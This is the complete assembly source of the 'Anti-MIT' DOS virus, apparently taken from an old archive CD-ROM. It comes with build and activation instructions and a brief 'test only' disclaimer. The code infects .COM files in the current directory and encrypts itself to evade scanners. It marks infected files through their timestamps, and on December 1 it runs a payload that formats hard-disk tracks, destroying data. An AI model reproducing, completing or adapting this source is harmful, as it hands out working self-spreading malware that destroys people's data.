home *** CD-ROM | disk | FTP | other *** search
- ; ** Anti-MIT Virus **
- ; To assemble, use TASM and TLINK to create a .COM file. Next
- ; run the .COM file in the same directory of a file you want to infect.
- ; Your system may hang, but after re-booting you will notice an increase
- ; in the target files size. Now debug the newly infected file and replace
- ; the first three bytes with E8 05 00 (call to encryption). Re-write the
- ; .COM file and now you should have a running copy of the Anti-Mit virus!
- ;
- ; - Do not distribute the Anti-MIT virus for this
- ; activity is against the law! The author will take
- ; NO responsiblity for others.
- ; TEST ONLY
- ;
- ; For more info see MIT.DOX file.
-
-
-
-
- name AntiMIT
- title Anti-MIT: The original Anti-MIT virus code!
- .radix 16
- code segment
- assume cs:code,ds:code
- org 100
-
- buffer equ offset 20000d ; Buffer
- fname equ offset 20000d + 1eh ; DTA - File name
- ftime equ offset 20000d + 16h ; DTA - File time
- fsize equ offset 20000d + 1ah ; DTA - File size
- olddta equ 80 ; Old DTA area
-
- start:
- jmp main ; *See above*
- nop
- jmp main ; Jmp to virus body
-
- encrypt_val db 0 ; Randomized encryption value
-
- decrypt: ; Encrypt/decrypt engine
- encrypt: ; [SKISM type]
- lea si, data
- mov ah, encrypt_val
- jmp fool_em ; Fool with the scanners
-
- xor_loop:
- lodsb ; ds:[si] -> al
- xor al, ah
- stosb ; al -> es:[di]
- loop xor_loop
- mov ah,19h ; Set current drive as default
- int 21h
- mov dh,al
- mov ah,0eh
- int 21h
- ret
-
- fool_em:
- mov di, si
- mov cx, stop_encrypt - data
- jmp xor_loop
-
-
-
- data label byte ; Virus data
- message db 'MIT Sux! $' ; The "message"
- lengthp dw ? ; Length of infected file
- allcom db '*.COM',0 ; What to search for
- virus db '[Anti-MIT]',0 ; Virus name
- author db 'Fîrs╪StrîkΣ',0 ; Author
-
- main: ; Main virus code
- mov ah,2ah ; Get the date
- int 21h
-
- cmp dh,12d ; Month 12?
- jnz next ; No
-
-
- cmp dl,01d ; Day one?
- jnz next ; No
- lea dx,message ; Yes, set off the "bomb"
- mov ah,09h
- int 21h
-
- mov ah,05h
- mov al,02h
- mov ch,00h
- mov dh,00h
- mov dl,80h
- int 13h
-
- mov ah,06h
- int 13h
-
- mov ah,05h
- mov dl,00h
- int 13h
-
- mov ah,4ch ; Exit
- int 21h
-
- next:
- mov cx,lengthp ; Figure out the Jmp
- sub cx,eendcode-start
- mov the_jmp,cx
-
-
-
-
- push es ; Save ES
- mov ax,3524h ; Get interrupt 24h handler
- int 21h ; and save it in errhnd
- mov [err1],bx
- mov [err2],es
- pop es ; Restore ES
-
- mov ax,2524h ; Set interrupt 24h handler
- lea dx,handler
- int 21h
-
- xor dx,dx ; Set DTA in "buffer" area
- mov si,dx
- mov dx,buffer
- add dx,si ; Set new Disk Transfer Address
- mov ah,1A ; Set DTA
- int 21
-
-
- find_first:
- mov dx,offset allcom ; Search for '*.COM' files
- mov cx,00000001b ; Normal, Write Protected
- mov ah,4E ; Find First file
- int 21
- jc pre_done ; Quit if none found
- jmp check_if_ill
-
- mover: ; The "mover" code
- push cs ; Store CS
- pop es ; and move it to ES
- mov di,0100h
- lea si,eendcode ; Move original code to
- add si,the_jmp ; beginning
- add si,endcode-mover
- mov cx,eendcode-start
- rep movsb
- mov di,0100h ; Jmp to CS:[100h]
- jmp di
-
- pre_done:
- jmp done ; Long jmp
-
- find_next:
- mov ah,4fh ; Search for next
- int 21h
- jc pre_done
-
- check_if_ill: ; File infected?
- mov ax,cs:[ftime]
- and al,11111b ; Look for the 62 sec marker
- cmp al,62d/2 ; [Vienna type]
- jz find_next
-
- cmp cs:[fsize],19000d ; Check if file larger then
- ja find_next ; 19000 bytes - if so skip
-
- cmp cs:[fsize],500d ; Check if file smaller then
- jb find_next ; 500 bytes - if so skip
-
-
- mainlp: ; Write the virus
- mov dx,fname
- mov ah,43h ; Write enable
- mov al,0
- int 21h
- mov ah,43h
- mov al,01h
- and cx,11111110b
- int 21h
-
-
- mov ax,3d02h ; Open file (read/write)
- int 21h
- jc pre_done
- mov bx,ax
-
- mov ax,5700h ; Get date for file
- int 21h
- mov [time],cx ; Save date info
- mov [date],dx
-
- mov ah,3fh ; Read original code into
- mov dx,buffer ; buffer (length of virus)
- mov cx,eendcode-start
- int 21h
- jc pre_done
- cmp ax,eendcode-start
- jne pre_done
-
-
- mov ah,42h ; Go to end of file
- mov al,02h
- xor cx,cx
- xor dx,dx
- int 21h
- jc pre_done
- mov cx,ax
- mov lengthp,ax ; Save original program code
-
- mov ah,40h ; Write "mover" code to end
- lea dx,mover ; of file
- mov cx,endcode-mover
- int 21h
- jc done
- cmp ax,endcode-mover
- jne done
-
- mov ah,40h ; Write original program code
- mov dx,buffer ; to end of the file
- mov cx,eendcode-start
- int 21h
- jc done
- cmp ax,eendcode-start
- jne done
-
- mov ah,42h ; Go to front of file
- mov al,00h
- xor cx,cx
- xor dx,dx
- int 21h
- jc done
-
- stop_encrypt:
- mov ah,2ch ; Get time
- int 21h
-
- mov encrypt_val,dh ; Use time as random encryption
- call encrypt ; value
-
- mov ah,40h ; Write virus code to front of
- lea dx,start ; file
- mov cx,eendcode-start
- int 21h
- jc done
- cmp ax,eendcode-start
- jne done
- jmp date_stuff
-
- handler:
- mov al,0
- iret
- endp
-
-
- time dw ? ; File stamp - time
- date dw ? ; File stamp - date
- err1 dw ? ; Original error handler
- err2 dw ? ; address
-
- date_stuff: ; Restore old file stamp
- mov ax,5701h
- mov cx,[time]
- mov dx,[date]
- and cl,not 11111b ; Set seconds field to 62 secs.
- or cl,11111b
- int 21h
- mov ah,3eh
- int 21h
- mov dx,olddta ; Restore "original" DTA
- mov ah,1ah
- int 21h
-
- push ds ; Save DS
- mov ax,2524h ; Set interrupt 24h handler
- mov dx,err1 ; Restore saved handler
- mov dx,err2
- mov ds,dx
- int 21h
- pop ds ; Restore DS
-
- done:
- xor cx,cx ; Clear registors
- xor dx,dx
- xor bx,bx
- xor ax,ax
- xor si,si
- jmp_code db 0e9h ; Preform jmp to "mover" code
- the_jmp dw ?
-
- go:
- eendcode label byte
-
- nop ; krap
- nop
- nop
- nop
- nop
-
-
-
-
- endcode label byte
-
-
-
-
-
-
-
-
-
-
-
-
- code ends
- end start
-
